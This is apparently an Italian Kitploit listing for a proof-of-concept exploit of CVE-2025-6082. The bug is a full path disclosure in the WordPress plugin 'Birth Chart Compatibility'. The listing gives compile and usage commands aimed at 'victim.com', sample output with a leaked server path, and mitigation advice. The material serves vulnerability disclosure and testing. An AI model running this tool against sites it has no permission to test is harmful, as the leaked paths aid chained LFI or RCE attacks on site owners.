Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/bytereaper77/cve-2025-6082
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingArchived
GitHubbytereaper77/cve-2025-6082

CVE-2025-6082

Proof‑of‑Concept sfrutta il bug di Full Path Disclosure nel plugin WordPress “Birth Chart Compatibility” (<=v2.0)

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
CVE-2025-6082 — Proof‑of‑Concept sfrutta il bug di Full Path Disclosure nel plugin WordPress “Birth Chart Compatibility” (<=v2.0) | Kitploit

CVE-2025-6082 PoC per Full Path Disclosure

Autore: Byte Reaper
Telegram: @ByteReaper0
CVE: CVE-2025-6082
Vulnerabilità: Full Path Disclosure (CWE-200)

Descrizione

Questa Proof‑of‑Concept sfrutta un bug di Full Path Disclosure nel plugin WordPress Birth Chart Compatibility (versioni ≤ 2.0). Il POC invia una richiesta HTTP GET all’endpoint index.php del plugin, cattura eventuali avvisi o errori fatali PHP e analizza il percorso del filesystem del server (ad esempio /var/www/html/wp-content/plugins/... o C:\xampp\htdocs\...).
Rivelare il percorso completo aiuta un attaccante a concatenare ulteriori attacchi di Inclusioni di File Locali (LFI), Esecuzione di Codice Remoto (RCE) o altre attività di ricognizione.

Requisiti

  • Linux
  • gcc o compilatore C compatibile
  • header di sviluppo libcurl
  • argparse.c / argparse.h

Compilazione

root@kitploit:~
gcc -o fpd-poc exploit.c argparse.c  -lcurl

Utilizzo

./fpd-poc -u https://target.com [options]

Opzioni:

Flag Descrizione

-u, --url (Obbligatorio) URL di base del sito WordPress di destinazione

-c, --cookies Usa i cookie dal FILE (opzionale)

-v, --verbose Abilita output verbose di curl

-f, --loop Ripeti la richiesta N volte (es. -f 10)

-h, --help Mostra questo messaggio di aiuto

Esempio:

Controllo singolo

./fpd-poc -u https://victim.com

Modalità verbose con 5 controlli ripetuti

./fpd-poc -u https://victim.com -v -f 5

Esempio di output:

[+] Richiesta inviata con successo

[+] URL di input : https://victim.com

[+] URL in formato completo: https://victim.com/wp-content/plugins/birth-chart-compatibility/index.php

[+] Codice HTTP : 200

====================================[Risposta]====================================

Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php): failed to open stream...

[+] Lunghezza risposta : 256

[+] Parola chiave trovata: Warning:

[+] Contesto: Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php

Mitigazione

Aggiorna il plugin “Birth Chart Compatibility” a una versione corretta (> 2.0) non appena rilasciata.

Disabilita o rimuovi il plugin se non lo usi.

Nega l'accesso diretto ai file PHP del plugin (index.php) tramite la configurazione del tuo server web (ad esempio tramite regole .htaccess o Nginx).

Disclaimer Questo codice è fornito solo a scopo educativo e di test. L'uso non autorizzato su sistemi di cui non si possiede o non si ha esplicito permesso di test potrebbe essere illegale.

Scarica lo strumento